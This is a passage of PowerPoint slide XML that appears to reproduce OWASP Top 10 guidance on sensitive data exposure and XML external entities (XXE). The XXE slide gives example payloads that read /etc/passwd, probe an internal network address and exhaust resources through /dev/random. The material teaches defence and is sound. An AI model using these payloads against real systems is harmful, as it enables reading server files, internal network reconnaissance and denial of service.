              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Cryptographic Storage</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OWASP Security Headers Project</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14"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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6"/>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7"/>
              </a:rPr>
              <a:t>CWE-220: Exposure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>sens.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> information through data queries</a:t>
            </a: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7"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption</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9"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</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20"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</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21"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</a:t>
            </a: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22"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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Do the following, at a minimum, and consult the references:</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Classify data processed, stored, or transmitted by an application. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs.</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Apply controls as per the classification.</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Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.</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Make sure to encrypt all sensitive data at rest.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Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.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Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin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Disable caching for responses that contain sensitive data.</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Store passwords using strong adaptive and salted hashing functions with a work factor (delay factor), such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>Argon2</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24"/>
              </a:rPr>
              <a:t>scrypt</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hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin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Verify independently the effectiveness of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>configuration and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> settings.</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A3</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Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2017337676"/>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pPr>
                        <a:buNone/>
                      </a:pPr>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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pP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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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Rather than directly attacking crypto, attackers </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser. A manual attack is generally required. Previously </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>retrieved password databases</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> could be brute forced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>by Graphics Processing Units (GPUs).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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atin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm, protocol and cipher usage is common, particularly for weak password hashing storage techniques. For data in transit, server side weaknesses are mainly easy to detect, but hard for data at rest. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>creden-tials</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, personal data, and credit cards, which often require protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</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28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544603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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Numerous public XXE issues have been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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The attacker attempts to extract data from the server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</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&lt;!DOCTYPE foo [</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&lt;!ELEMENT foo ANY &gt;</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;</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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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An attacker probes the server's private network by changing the above ENTITY line to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An attacker attempts a denial-of-service attack by including a potentially endless file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;</a:t>
            </a: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ct val="90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Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any of the XML processors in the application or SOAP based web services has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If your application uses SAML for identity processing within federated security or single sign on (SSO) purposes. SAML uses XML for identity assertions, and may be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service attacks including the Billion Laughs attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
